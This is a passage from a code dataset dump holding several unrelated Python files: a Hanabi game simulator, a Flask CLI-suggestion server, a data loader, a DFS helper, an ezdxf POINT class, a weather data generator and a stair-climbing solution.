vector_b.T)\n denom = np.linalg.norm(vector_a) * np.linalg.norm(vector_b)\n cos = num / denom\n sim = 0.5 + 0.5 * cos\n return sim\n'''\nbert pretrain\n'''\ndef generate_dict(output_file):\n course_list = range(num_course)\n job_vector = np.load(bert_pretrain_job_npy_path)\n course_vector = np.load(bert_pretrain_course_npy_path)\n with open(output_file, 'w') as writer:\n for job_index in range(num_train_job):\n writer.write(str(job_index)+' ')\n job_ebd = job_vector[job_index]\n predictions = []\n for course_index in range(num_course):\n course_ebd = course_vector[course_index]\n predictions.append(cos_sim(course_ebd, job_ebd))\n map_course_score = {course_list[t]: predictions[t] for t in range(len(course_list))}\n ranklist = heapq.nlargest(num_course, map_course_score, key=map_course_score.get)\n for item in ranklist:\n writer.write(str(item)+' ')\n writer.write('\\n')\n\n","sub_path":"majority_voting_dict/code/generate_bert_dict.py","file_name":"generate_bert_dict.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"201596330","text":"\nimport random\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nclass Card:\n def __init__(self, color, number, id):\n self.color = color\n self.number = number\n self.id = id\n self.known_color = False\n self.known_number = False\n\nclass Player:\n def __init__(self, id, hand, otherplayers, commondicts, colors_all):\n self.id = id\n self.hand = hand\n self.otherplayers = otherplayers\n self.commondicts = commondicts\n self.known_hand = [('black',0),('black',0),('black',0),('black',0)] #0 is unknown, so is black\n self.colors_all = colors_all\n\n def update_info(self, otherplayers, commondicts):\n self.otherplayers = otherplayers\n self.commondicts = commondicts\n\n# select what to do according to strategy\n def select_action(self,possibility_tables,playable_cards,possible_cards,dead_cards,hint_count,handstable):\n if not self.check_whether_playable_card(possibility_tables,playable_cards) == -1:\n return ['PLAY', self.check_whether_playable_card(possibility_tables,playable_cards)]\n elif (np.sum(playable_cards) + (50-np.sum(np.sum(possible_cards)))) < 5 and self.check_dead_card(possibility_tables,dead_cards) >= 0:\n return ['DISCARD UNDER 5', self.check_dead_card(possibility_tables,dead_cards)]\n elif hint_count > 0:\n return ['HINT']\n elif self.check_dead_card(possibility_tables,dead_cards) >= 0:\n return ['DISCARD DEAD CARD', self.check_dead_card(possibility_tables,dead_cards)]\n #TO DO : CHECK NEXT TWO ELIF STATEMENTS: I've improved them'\n elif self.check_whether_card_known_duplicate(possibility_tables,handstable) !=-1:\n return ['DISCARD DUPLICATE', self.check_whether_card_known_duplicate(possibility_tables,handstable)]\n elif self.check_whether_dispensable_card_known(possibility_tables, possible_cards)!=-1:\n return ['DISCARD DISPENSABLE', self.check_whether_dispensable_card_known(possibility_tables, possible_cards)]\n else:\n #to do: first card could be indispensible, gets discarded. Add priority to hint?\n # note sanne: we only go here if there are no hints left\n return['DISCARD FIRST CARD',0]\n return action\n\n# check whether one of the cards in the hand is playable, if so, return index of that card\n def check_whether_playable_card(self,possibility_tables,playable_cards):\n for card in range(0,4):\n possibly_playable = True\n for color in range(0,5):\n for value in range(0,5):\n # if one of the possibilities is not playable card is not possibly playable\n if possibility_tables[self.id,card,color,value] != 0:\n if value != playable_cards[color]:\n possibly_playable = False\n if possibly_playable:\n return card\n return -1\n\n\n# check whether one of the cards in the hand is dead, if so, return index of that card\n def check_dead_card(self, possibility_tables, dead_cards):\n # check for each card whether all possibilities are dead\n for card in range(0,4):\n possibly_all_dead = True\n for color in range(0,5):\n for value in range(0,5):\n if possibility_tables[self.id,card,color,value] != 0 and value > dead_cards[color]:\n possibly_all_dead = False\n break\n if not possibly_all_dead:\n break\n if possibly_all_dead:\n return card\n return -1\n\n# check whether one card is known to be a duplicate (in the hands of other players)\n def check_whether_card_known_duplicate(self,possibility_tables,handstable):\n for card in range(0,4):\n possible_duplicate = True\n for color in range(0,5):\n for value in range(0,5):\n if possibility_tables[self.id,card,color,value] == 1:\n card_dup = [self.colors_all[color],value]\n if card_dup in handstable:\n return card\n return -1\n\n\n# check whether one card is known to be dispensable\n def check_whether_dispensable_card_known(self,possibility_tables,possible_cards):\n for card in range(0,4):\n possible_dispensable = True\n for color in range(0,5):\n for value in range(0,5):\n if possibility_tables[self.id,card,color,value] == 1:\n if possible_cards[color,value] < 2:\n possible_dispensable = False\n break\n if not possible_dispensable:\n break\n if possible_dispensable:\n return card\n return -1\n\n\n\n\nclass Game:\n def __init__(self, nplayers, ncards, ncolors):\n self.colors_all = ['white', 'blue', 'red', 'green', 'yellow', 'orange']\n self.colors_all = self.colors_all[:ncolors]\n self.cardlist = [0,0,0,1,1,2,2,3,3,4]\n self.hint_count = 8\n self.mistake_count = 3\n self.score = 0\n self.play_token = 1\n self.nplayers = nplayers\n self.ncards = ncards\n self.ncolors = ncolors\n self.center = {}\n self.playable_cards = np.zeros((ncolors))\n self.dead_cards = np.zeros((ncolors)) -1\n # print(self.playable_cards)\n self.discard_pile = []\n self.commondicts = {'center': self.center,\n 'discard_dict': self.discard_pile\n }\n playerlist = self.create_players(self.nplayers, self.commondicts)\n self.playerlist = playerlist\n self.deck = self.create_deck(self.colors_all[0:self.ncolors+1], self.cardlist)\n self.possibility_tables = np.zeros((nplayers,ncards,ncolors,5)) + 1\n self.possible_cards = np.array([[3,2,2,2,1],[3,2,2,2,1],[3,2,2,2,1],[3,2,2,2,1],[3,2,2,2,1]])\n\n\n# function that updates the number of cards still possible to have in your hand,\n# for every card (i.e. not discarded or played)\n def update_possible_cards(self,card_color,card_value):\n self.possible_cards[card_color,card_value] -= 1\n # if the number of cards of this type becomes equal to 0, this is common\n # knowledge and this card is for no one possible to have in their hand\n if self.possible_cards[card_color, card_value] == 0:\n self.possibility_tables[:,:,card_color, card_value] = 0\n\n# Hints also have to be incorporated wordly (the explicit meaning of the hings)\n def incorporate_hint_wordly(self,player,cards,value_color,color_hint):\n if color_hint:\n for color in range(0,self.ncolors):\n if color != value_color:\n self.possibility_tables[player,cards,color,:] = 0\n else:\n for value in range(0,5):\n if value != value_color:\n self.possibility_tables[player,cards,:, value] = 0\n\n# what cards can the player see on the table now\n def cards_on_table_seen(self):\n handtotal = []\n for i in range(0,self.nplayers):\n if i != self.turn_token:\n handtotal += self.playerlist.get(i).hand\n return handtotal\n\n# return the cards that are targeted this round\n# calculates for all players the probability of all cards to be playable\n# and targets the cards with highest probability per player\n def return_targeted_cards(self):\n targeted_cards = np.zeros((self.nplayers))\n for player in range(0,self.nplayers):\n cards = np.zeros((self.ncards))\n for card in range(0,self.ncards):\n ncards = 0\n nplayable_cards = 0\n for color in range(0,self.ncolors):\n for value in range(0,5):\n if self.possibility_tables[player,card,color,value] == 1:\n ncards += self.possible_cards[color,value]\n if self.playable_cards[color] == value:\n nplayable_cards += self.possible_cards[color,value]\n if ncards!=0:\n cards[card] = nplayable_cards/ncards\n\n targeted_cards[player] = int(np.argmax(cards))\n\n return targeted_cards\n\n\n# create hint tables for all the targeted cards\n def targeted_cards_to_hints(self, targeted_cards):\n# initialize them with 0's on dead cards, -1's on impossible cards and\n# 1,2,3,4,5,6,7,7,7,7,7,7 etc.\n hint_tables = np.zeros((self.nplayers,self.ncolors,5))\n for player in range(0,self.nplayers):\n hint_table = self.possibility_tables[player,int(targeted_cards[player]),:,:] -1\n hintnum = 1\n for value in range(0,5):\n for color in range(0,self.ncolors):\n if hint_table[color,value] == 0 and self.dead_cards[color] < value:\n hint_table[color,value] = hintnum\n if hintnum != 7:\n hintnum += 1\n u, counts = np.unique(hint_table, return_counts = True)\n # make sure that no hint value occurs more than 8 times\n if len(counts) > 6:\n if counts[-1] > 8:\n seven_surplus = counts[-1]-8\n six_surplus = 0\n if seven_surplus > 8:\n six_surplus = seven_surplus-7\n seven_surplus = 8\n for value in range(0,5):\n for color in range(0,self.ncolors):\n if (hint_table[color,value] == 7 or hint_table[color,value] == 6) and six_surplus > 0:\n hint_table[color,value] = 5\n six_surplus -= 1\n elif hint_table[color,value] == 7 and seven_surplus >0:\n hint_table[color,value] = 6\n seven_surplus -= 1\n hint_tables[player,:,:] = hint_table\n return hint_tables\n\n# decide which hint to give, making use of the hint tables\n def decide_hint(self, origin_player_id,targeted_cards,hint_tables):\n # decide on which hidden hint to play\n sum = 0\n for coplayers in range(0,self.nplayers):\n if coplayers != origin_player_id:\n hand = self.playerlist.get(coplayers).hand\n card_index = targeted_cards[coplayers]\n hint_table = hint_tables[coplayers,:,:]\n true_card = hand[int(card_index)]\n color_int = self.colors_all.index(true_card[0])\n val = true_card[1]\n sum += hint_table[color_int,val]\n hintval = sum%8\n# convert this hidden hint value into a wordly hint\n hint = self.convert_val_to_hint(origin_player_id,hintval,targeted_cards)\n return hint\n\n# make a wordly hint of the hint value\n def convert_val_to_hint(self,player,hintval,targeted_cards):\n # decode value to wordly hint\n hint_player = int((hintval%4 + player)%5)\n hint_color = True\n if hintval < 4:\n hint_color = False\n hand = self.playerlist.get(hint_player).hand\n tg = targeted_cards[int(hint_player)]\n# decide on which cards to give hints about\n# prioritize colors/values that occur more often\n if hint_color:\n indices = []\n colors = [hand[0][0],hand[1][0],hand[2][0],hand[3][0]]\n if len(colors) == len(list(set(colors))) + 1:\n if colors[0] == colors[1]:\n indices += [0,1]\n if colors[0] == colors[2]:\n indices += [0,2]\n if colors[0] == colors[3]:\n indices += [0,3]\n if colors[1] == colors[2]:\n indices += [1,2]\n if colors[2] == colors[3]:\n indices += [2,3]\n if colors[1] == colors[3]:\n indices += [1,3]\n elif len(colors) == len(list(set(colors))) + 2:\n if colors[0] == colors[1] == colors[2]:\n indices += [0,1,2]\n if colors[3] == colors[1] == colors[2]:\n indices += [3,1,2]\n if colors[0] == colors[1] == colors[3]:\n indices += [0,1,3]\n if colors[0] == colors[2] == colors[3]:\n indices += [0,3,2]\n if colors[0] == colors[1] and colors[2] == colors[3]:\n indices += [2,3]\n if colors[0] == colors[2] and colors[1] == colors[3]:\n indices += [1,3]\n if colors[0] == colors[3] and colors[1] == colors[2]:\n indices += [1,2]\n elif len(list(set(colors))) == 1:\n indices += [0,1,2,3]\n else:\n\n reduce = 0\n indices = [1]\n\n for i in range(1,self.ncards):\n ncards = np.sum(np.sum(self.possibility_tables[hint_player,i,:,:]))\n ncardspercolor = np.sum(self.possibility_tables[hint_player,i,self.colors_all.index(hand[i][0]),:])\n if ncards - ncardspercolor > reduce:\n reduce = ncards - ncardspercolor\n indices = [i]\n\n return [hint_player,indices,hand[indices[0]][0],hint_color]\n else:\n indices = []\n colors = [hand[0][1],hand[1][1],hand[2][1],hand[3][1]]\n if len(colors) == len(list(set(colors))) + 1:\n if colors[0] == colors[1]:\n indices += [0,1]\n if colors[0] == colors[2]:\n indices += [0,2]\n if colors[0] == colors[3]:\n indices += [0,3]\n if colors[1] == colors[2]:\n indices += [1,2]\n if colors[2] == colors[3]:\n indices += [2,3]\n if colors[1] == colors[3]:\n indices += [1,3]\n elif len(colors) == len(list(set(colors))) + 2:\n if colors[0] == colors[1] == colors[2]:\n indices += [0,1,2]\n if colors[3] == colors[1] == colors[2]:\n indices += [3,1,2]\n if colors[0] == colors[1] == colors[3]:\n indices += [0,1,3]\n if colors[0] == colors[2] == colors[3]:\n indices += [0,3,2]\n if colors[0] == colors[1] and colors[2] == colors[3]:\n indices += [2,3]\n if colors[0] == colors[2] and colors[1] == colors[3]:\n indices += [1,3]\n if colors[0] == colors[3] and colors[1] == colors[2]:\n indices += [1,2]\n elif len(list(set(colors))) == 1:\n indices += [0,1,2,3]\n else:\n\n reduce = 0\n indices = [1]\n\n for i in range(1,self.ncards):\n ncards = np.sum(np.sum(self.possibility_tables[hint_player,i,:,:]))\n ncardspercolor = np.sum(self.possibility_tables[hint_player,i,:, hand[i][1]])\n if ncards - ncardspercolor > reduce:\n reduce = ncards - ncardspercolor\n indices = [i]\n\n return [hint_player,indices,hand[indices[0]][1],hint_color]\n\n\n def convey_hidden_hint(self,hint, origin_player_id,targeted_cards,hint_tables):\n hint_player = (hint[0] + 5 - origin_player_id)%4\n if hint[3]:\n hint_player += 4\n # print(\"hint_player = \"+str(hint_player))\n\n for coplayers in range(0, self.nplayers):\n if coplayers != origin_player_id:\n sum = 0\n for other in range(0, self.nplayers):\n if other != coplayers and other != origin_player_id:\n hand = self.playerlist.get(other).hand\n # print ('Handsan:',[c for c in hand])\n card_index = targeted_cards[other]\n # print(card_index)\n hint_table = hint_tables[other,:,:]\n true_card = hand[int(card_index)]\n color_int = self.colors_all.index(true_card[0])\n val = true_card[1]\n # print(\"other \" + str(other) + str(hint_table[color_int,val]) + str(true_card))\n sum += hint_table[color_int,val]\n # print(\"sum = \" +str(sum))\n # print(\"hintval = \" +str(sum%8) )\n # print(\"hint_player = \"+str(hint_player))\n hintval = (sum + 8)%8\n hintval = (hint_player + 8 - hintval)%8\n # print(\"hv =\" +str(hintval))\n for color in range(0,self.ncolors):\n for value in range(0,5):\n if hint_tables[coplayers,color,value] != hintval:\n self.possibility_tables[coplayers,int(targeted_cards[coplayers]),color,value] =0\n\n\n\n def create_players(self, nplayers, commondicts):\n playerlist = {}\n pids = range(0,self.nplayers)\n for pid in pids:\n otherplayers = {}\n others = [p for p in pids if p is not pid]\n for other in others:\n otherplayers.update({other:[]})\n #print (otherplayers)\n playerlist.update({pid:Player(id=pid, hand=[], commondicts=commondicts, otherplayers=otherplayers, colors_all = self.colors_all)})\n return playerlist\n\n def create_deck(self, colors, cardlist):\n deck = []\n id = 1\n for c in colors:\n for n in cardlist:\n #newcard = Card(id = id, color=c, number=int(n))\n newcard = [c,n]\n deck.append(newcard)\n random.shuffle(deck)\n id+=1\n return deck\n\n def deal_initial(self):\n for i in range(1, self.ncards+1):\n pids = self.playerlist.keys()\n for j in pids:\n self.deal_card(pid=j)\n return True\n\n def deal_card(self, pid): #Currently being corrected\n if (len(self.playerlist.get(pid).hand) < self.ncards):\n card = self.deck.pop()\n playerinfo = self.playerlist.get(pid)\n h = playerinfo.hand.append(card)\n else:\n print ('Hand already full')\n\n def print_player_info(self):\n for id in self.playerlist.keys():\n print('Player ID: ',id)\n this_player = self.playerlist.get(id)\n #print ('Hand:',[[c.color,c.number] for c in this_player.hand])\n print ('Hand:',[c for c in this_player.hand])\n\n def update_player_info(self):\n commondicts = self.commondicts\n for pid in self.playerlist.keys():\n thisplayer = self.playerlist.get(pid)\n othersdict = {}\n others = [x for x in self.playerlist.keys() if x is not pid]\n for other in others:\n h = self.playerlist.get(other).hand\n othersdict.update({other:h})\n #print (othersdict)\n thisplayer.update_info(otherplayers=othersdict, commondicts=commondicts)\n\n\n\n def play_card(self, player_id, card_to_play):\n carddetails = self.playerlist.get(player_id).hand.pop(card_to_play)\n color = self.colors_all.index(carddetails[0])\n value = carddetails[1]\n self.dead_cards[color] += 1\n self.playable_cards[color] += 1\n self.update_possible_cards(color,value)\n for card in range(card_to_play,3):\n self.possibility_tables[player_id,card,:,:] = self.possibility_tables[player_id,card + 1,:,:]\n newcard = np.zeros((self.ncolors,5))\n newcard[np.where(self.possible_cards > 0)] = 1\n self.possibility_tables[player_id,3,:,:] = newcard\n\n self.deal_card(pid=player_id)\n self.score += 1\n\n def play_discard(self, player_id, card_index):\n # print(card_index)\n selected_card = self.playerlist.get(player_id).hand.pop(card_index)\n for card in range(card_index,3):\n self.possibility_tables[player_id,card,:,:] = self.possibility_tables[player_id,card + 1,:,:]\n newcard = np.zeros((self.ncolors,5))\n newcard[np.where(self.possible_cards > 0)] = 1\n self.possibility_tables[player_id,3,:,:] = newcard\n self.deal_card(player_id)\n self.discard_pile.append(selected_card)\n self.hint_count+=1\n #check if there are other variables that need updating when a card is discarded\n self.update_possible_cards(self.colors_all.index(selected_card[0]),selected_card[1])\n\n def play_game(self):\n #select player to start\n self.turn_token = 0 #randomize\n # self.incorporate_hint_wordly(2,3,1,True)\n # self.incorporate_hint_wordly(3,0,0,False)\n # self.incorporate_hint_wordly(1,2,3,True)\n # print(self.possibility_tables[4,0])\n tg = self.return_targeted_cards()\n # print(self.targeted_cards_to_hints(tg))\n #loop till you out of tokens\n last_turn = True\n player_last_turn = 0\n while self.mistake_count>=0 and self.score != 25 and sum(sum(self.possible_cards)) > self.nplayers * self.ncards and last_turn == True:\n # make sure every player gets one last turn before the game ends\n if sum(sum(self.possible_cards)) <= self.nplayers * self.ncards:\n player_last_turn += 1\n if player_last_turn == self.nplayers:\n last_turn = False\n # print(\"mistake was made\")\n #Update player info\n self.update_player_info()\n targeted_cards = self.return_targeted_cards()\n hint_tables = self.targeted_cards_to_hints(targeted_cards)\n #Call to player for action\n this_act = self.playerlist.get(self.turn_token).select_action(self.possibility_tables,self.playable_cards,self.possible_cards, self.dead_cards,self.hint_count,self.cards_on_table_seen())\n # perform action\n if this_act[0] == 'PLAY':\n self.play_card(self.turn_token, this_act[1])\n elif this_act[0] == 'HINT':\n # decide which hint to give\n hint = self.decide_hint(self.turn_token, targeted_cards,hint_tables)\n if hint[3]:\n value_color = int(self.colors_all.index(hint[2]))\n else:\n value_color = hint[2]\n # convey the hidden meaning\n self.convey_hidden_hint(hint,self.turn_token,targeted_cards,hint_tables)\n # convey the wordly meaning\n self.incorporate_hint_wordly(int(hint[0]),hint[1],value_color,hint[3])\n self.hint_count = self.hint_count -1\n\n elif this_act[0].split()[0]=='DISCARD':\n self.play_discard(self.turn_token, this_act[1])\n# switch turns\n self.turn_token += 1\n if self.turn_token == self.nplayers:\n self.turn_token = 0\n print(\"Score = \" + str(self.score))\n print(\"Num Cards Left = \" + str(sum(sum(self.possible_cards))))\n return self.score\n\n\ndef gameloop():\n scores = []\n for i in range(0,500):\n\n manager = Game(5,4,5)\n # print (manager.playerlist)\n manager.deal_initial()\n # manager.print_player_info()\n scores += [manager.play_game()]\n print(np.mean(scores))\n plt.hist(scores)\n plt.xticks(list(set(scores)))\n plt.title('Scores Distribution over 500 games for 5 players')\n plt.xlabel('Final Scores')\n plt.ylabel('Count')\n plt.show()\n\n #get latest game elements\n #decide action\n #hint\n #discard\n #play\n #updates lie within action code\n #next turn\n\ngameloop()\n#manager = Game(5,4,5)\n# print (manager.playerlist)\n#manager.deal_initial()\n# manager.print_player_info()\n#manager.play_game()\n","sub_path":"tempf.py","file_name":"tempf.py","file_ext":"py","file_size_in_byte":24176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"506482952","text":"from flask import Flask, jsonify\napp = Flask(__name__)\n\nprint(\"initializing\")\n\nimport modelFactory\nfrom modelBase import Suggestion\n\ncliModel = modelFactory.getBaselineModel()\n\n@app.route('/')\ndef hello_world():\n return 'Welcome to smart cloud shell! Please help with testing/labeling at https://bizqnabootcamp.azurewebsites.net/'\n\n@app.route('/cli/')\ndef cliWithCmd(query):\n result = cliModel.getLegacyResult(query)\n return jsonify(result)\n\n@app.route('/cli/help/')\ndef cliWithHelp(query):\n result = cliModel.getLegacyResult(query)\n return jsonify(result)\n\nport = 80\nprint(\"localhost:%d is serving\" % port)\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=port)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"117201263","text":"import numpy as np\nimport pickle\nclass dataclass():\n \"\"\"\n operactions with data\n\n This class contains all the parameters related with the training, validating and testing dataset.\n All the parameters are set outside this class! They are not supposed to be set here.\n\n fcn:\n GetTraindata(): returns the training data for the network\n Getvaldata(): returns the validating data for the network\n \n \"\"\"\n def __init__(self, dataname='', dimpara=[], datadim=[], testdataname=''):\n self.trainsize = dimpara[0]\n self.batchsize = dimpara[1]\n self.validatesize = dimpara[2]\n self.Nbofbatch=self.trainsize//self.batchsize\n self.datadim = datadim #[imput dim0 dim1..., output dim]\n if dataname[0]=='':\n self.data= []\n else: \n with open(dataname[0], 'rb') as f:\n self.data=pickle.load(f)\n self.featurename = dataname[1]\n self.labelitem = dataname[2]\n self.labelname = dataname[3]\n self.testdataname = testdataname\n # print(self.data[self.featurename].shape)\n \n def Gettraindata(self,startbatch=0):\n inputx = self.data[self.featurename][startbatch*self.batchsize:(startbatch+1)*self.batchsize,:].reshape([self.batchsize]+self.datadim[:-1])\n inputy = np.array(self.data[self.labelitem][self.labelname].iloc[startbatch*self.batchsize:(startbatch+1)*self.batchsize]).reshape(self.batchsize,1)\n return inputx, inputy\n\n def Getvaldata(self):\n valx = self.data[self.featurename][self.trainsize:self.trainsize+self.validatesize,:].reshape([self.validatesize]+self.datadim[:-1])\n valy = np.array(self.data[self.labelitem][self.labelname].iloc[self.trainsize:self.trainsize+self.validatesize]).reshape(self.validatesize,1)\n return valx, valy\n \n def Gettestdata(self,flag):\n with open(self.testdataname, 'rb') as f:\n datafromfile=pickle.load(f)\n testsize = datafromfile[self.featurename].shape[0]\n testx = datafromfile[self.featurename][:,800+flag:2200+flag].reshape([testsize]+self.datadim[:-1])\n return testx\n","sub_path":"nnx/network/dataclass.py","file_name":"dataclass.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"4486882","text":"from collections import deque\n\ndef dfs(graph, source, target, condition=None, process=None):\n visited, stack = [False] * graph.V, deque()\n stack.append(source)\n\n while stack:\n u = stack.pop()\n visited[u] = True\n if u == target:\n break\n if condition != None:\n for edge in graph.edges(u):\n u, v, _ = edge\n if not visited[v] and condition(edge):\n if process != None:\n process(edge)\n stack.append(v)\n else:\n for edge in graph.edges(u):\n u, v, _ = edge\n if not visited[v]:\n if process != None:\n process(edge)\n stack.append(v)\n return visited","sub_path":"algorithms/traversal/dfs.py","file_name":"dfs.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"631296889","text":"# Copyright (c) 2019-2020 Manfred Moitzi\n# License: MIT License\n# Created 2019-02-15\nfrom typing import TYPE_CHECKING\nfrom ezdxf.math import Vector, Matrix44\nfrom ezdxf.math.transformtools import transform_thickness_and_extrusion_without_ocs\nfrom ezdxf.lldxf.attributes import DXFAttr, DXFAttributes, DefSubclass, XType\nfrom ezdxf.lldxf.const import DXF12, SUBCLASS_MARKER\nfrom .dxfentity import base_class, SubclassProcessor\nfrom .dxfgfx import DXFGraphic, acdb_entity\nfrom .factory import register_entity\n\nif TYPE_CHECKING:\n from ezdxf.eztypes import TagWriter, DXFNamespace, UCS\n\n__all__ = ['Point']\n\nacdb_point = DefSubclass('AcDbPoint', {\n 'location': DXFAttr(10, xtype=XType.point3d, default=Vector(0, 0, 0)),\n 'thickness': DXFAttr(39, default=0, optional=True),\n 'extrusion': DXFAttr(210, xtype=XType.point3d, default=Vector(0, 0, 1), optional=True),\n # angle of the X axis for the UCS in effect when the point was drawn (optional, default = 0); used when PDMODE is\n # nonzero\n 'angle': DXFAttr(50, default=0, optional=True),\n})\n\n\n@register_entity\nclass Point(DXFGraphic):\n \"\"\" DXF POINT entity \"\"\"\n DXFTYPE = 'POINT'\n DXFATTRIBS = DXFAttributes(base_class, acdb_entity, acdb_point)\n\n def load_dxf_attribs(self, processor: SubclassProcessor = None) -> 'DXFNamespace':\n \"\"\" Loading interface. (internal API) \"\"\"\n dxf = super().load_dxf_attribs(processor)\n if processor:\n tags = processor.load_dxfattribs_into_namespace(dxf, acdb_point)\n if len(tags) and not processor.r12:\n processor.log_unprocessed_tags(tags, subclass=acdb_point.name)\n return dxf\n\n def export_entity(self, tagwriter: 'TagWriter') -> None:\n \"\"\" Export entity specific data as DXF tags. (internal API) \"\"\"\n # base class export is done by parent class\n super().export_entity(tagwriter)\n # AcDbEntity export is done by parent class\n if tagwriter.dxfversion > DXF12:\n tagwriter.write_tag2(SUBCLASS_MARKER, acdb_point.name)\n # for all DXF versions\n self.dxf.export_dxf_attribs(tagwriter, ['location', 'thickness', 'extrusion', 'angle'])\n\n def transform(self, m: Matrix44) -> 'Point':\n \"\"\" Transform POINT entity by transformation matrix `m` inplace.\n\n .. versionadded:: 0.13\n\n \"\"\"\n self.dxf.location = m.transform(self.dxf.location)\n transform_thickness_and_extrusion_without_ocs(self, m)\n # ignore dxf.angle!\n return self\n\n def translate(self, dx: float, dy: float, dz: float) -> 'Point':\n \"\"\" Optimized POINT translation about `dx` in x-axis, `dy` in y-axis and `dz` in z-axis,\n returns `self` (floating interface).\n\n .. versionadded:: 0.13\n\n \"\"\"\n self.dxf.location = Vector(dx, dy, dz) + self.dxf.location\n return self\n","sub_path":"src/ezdxf/entities/point.py","file_name":"point.py","file_ext":"py","file_size_in_byte":2849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"229470548","text":"from datetime import datetime, timedelta\nimport csv\nimport random\n\nclass Timer:\n\n\tdef __init__(self):\n\t\tself.start_dt = None\n\n\tdef start(self):\n\t\tself.start_dt = datetime.now()\n\n\tdef stop(self):\n\t\tend_dt = datetime.now()\n\t\tprint('Time taken: %s' % (end_dt - self.start_dt))\n\n\nclass Writer:\n\n\tdef write_predict(self, date, value, file_name):\n\t\twith open(file_name, 'a') as temp_file:\n\t\t\ttemp_writer = csv.writer(temp_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_NONNUMERIC)\n\t\t\ttemp_writer.writerow([date, value])\n\n\tdef set_file_to_write(self, file):\n\t\treturn file\n\nclass CsvReader:\n\n\tdef __init__(self):\n\t\tself.csvfilename = None\n\n\tdef get_last_raw_date(self, csvfilename):\n\t\trow_index = 0\n\t\twith open(csvfilename, \"r\") as scraped:\n\t\t\treader = csv.reader(scraped, delimiter=',')\n\t\t\tfor row in reader:\n\t\t\t\tif row: # avoid blank lines\n\t\t\t\t\trow_index += 1\n\t\t\t\t\tlast_date = row[0]\n\t\treturn last_date\n\n\tdef get_last_raw_temperature(self, csvfilename):\n\t\trow_index = 0\n\t\twith open(csvfilename, \"r\") as scraped:\n\t\t\treader = csv.reader(scraped, delimiter=',')\n\t\t\tfor row in reader:\n\t\t\t\tif row: # avoid blank lines\n\t\t\t\t\trow_index += 1\n\t\t\t\t\tlast_temperature = row[1]\n\t\tfloat_temp = float(last_temperature)\n\t\tint_temp = int(float_temp)\n\t\treturn int_temp\n\n\tdef get_last_row(self, csvfilename):\n\t\trow_index = 0\n\t\twith open(csvfilename, \"r\") as scraped:\n\t\t\treader = csv.reader(scraped, delimiter=',')\n\t\t\tfor row in reader:\n\t\t\t\tif row: # avoid blank lines\n\t\t\t\t\trow_index += 1\n\t\t\t\t\tcolumns = [str(row_index), row[0], row[1]]\n\t\treturn columns\n\n\nclass DateConverter:\n\n\tdef convert_to_datetime(self, string_date):\n\t\tdate = datetime.strptime(string_date, \"%Y-%m-%d\")\n\t\tdate = date.date()\n\t\treturn date\n\n\tdef get_next_day(self, actual_date):\n\t\tactual_date += timedelta(days=1)\n\t\treturn actual_date\n\n\nclass DateGenerator:\n\n\tdef generator(self, numberOfDate):\n\t\treader = CsvReader()\n\t\tconverter = DateConverter()\n\t\twriter = Writer()\n\t\tfilename = \"./data/weather_ajaccio.csv\"\n\t\tlast_row_date = reader.get_last_raw_date(filename)\n\t\tlast_row_date_to_data = converter.convert_to_datetime(last_row_date)\n\t\tnext_date = converter.get_next_day(last_row_date_to_data)\n\t\tlast_row_temp = reader.get_last_raw_temperature(filename)\n\t\tfor x in range(numberOfDate):\n\t\t\tif next_date.month == 1 or next_date.month == 2 or next_date.month == 3:\n\t\t\t\trandom_plus_temp = random.randint(-15, 0)\n\t\t\telif next_date.month == 4 or next_date.month == 5:\n\t\t\t\trandom_plus_temp = random.randint(-2, 2)\n\t\t\telif next_date.month == 6 or next_date.month == 7 or next_date.month == 8:\n\t\t\t\trandom_plus_temp = random.randint(4, 15)\n\t\t\telif next_date.month == 9 or next_date.month == 10:\n\t\t\t\trandom_plus_temp = random.randint(-4, 4)\n\t\t\telse:\n\t\t\t\trandom_plus_temp = random.randint(-8, 2)\n\n\t\t\ttemp = last_row_temp + random_plus_temp\n\t\t\twriter.write_predict(next_date,temp,filename)\n\t\t\tnext_date = converter.get_next_day(next_date)\n","sub_path":"Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":2879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"545589399","text":"'''\n\nYou are climbing a stair case. It takes n steps to reach to the top.\n\nEach time you can either climb 1 or 2 steps. In how many distinct ways can you climb to the top?\n\nNote: Given n will be a positive integer.\n\nExample 1:\n\nInput: 2\nOutput: 2\nExplanation: There are two ways to climb to the top.\n1. 1 step + 1 step\n2. 2 steps\nExample 2:\n\nInput: 3\nOutput: 3\nExplanation: There are three ways to climb to the top.\n1. 1 step + 1 step + 1 step\n2. 1 step + 2 steps\n3. 2 steps + 1 step\n\n'''\n\nclass Solution:\n def climbStairs(self,n):\n if n == 1 or n == 2:\n return n\n else:\n return self.climbStairs(n-1)+self.climbStairs(n-2)\n def climbStairs2(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n if n == 0:\n \treturn 0\n\n dp = [0]*n\n dp[0], dp[1] = 1, 2\n\n for index in range(2, n):\n \tdp[index] = dp[index-1] + dp[index-2]\n return dp[n-1]\n\n# Time: O(N)\n# Space: O(N)\n\nprint (Solution().climbStairs(7))\n\n#Time complexity : O(n). Single loop upto n.\n\n#Space complexity : O(n). array of size n is used.\n","sub_path":"dynamic_programming/70-Climbing-Stairs.py","file_name":"70-Climbing-Stairs.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"171161901","text":"# Confidential, Copyright 2020, Sony Corporation of America, All rights reserved.\n\nfrom typing import List, Optional\n\nimport numpy as np\n\nfrom .person_routines import 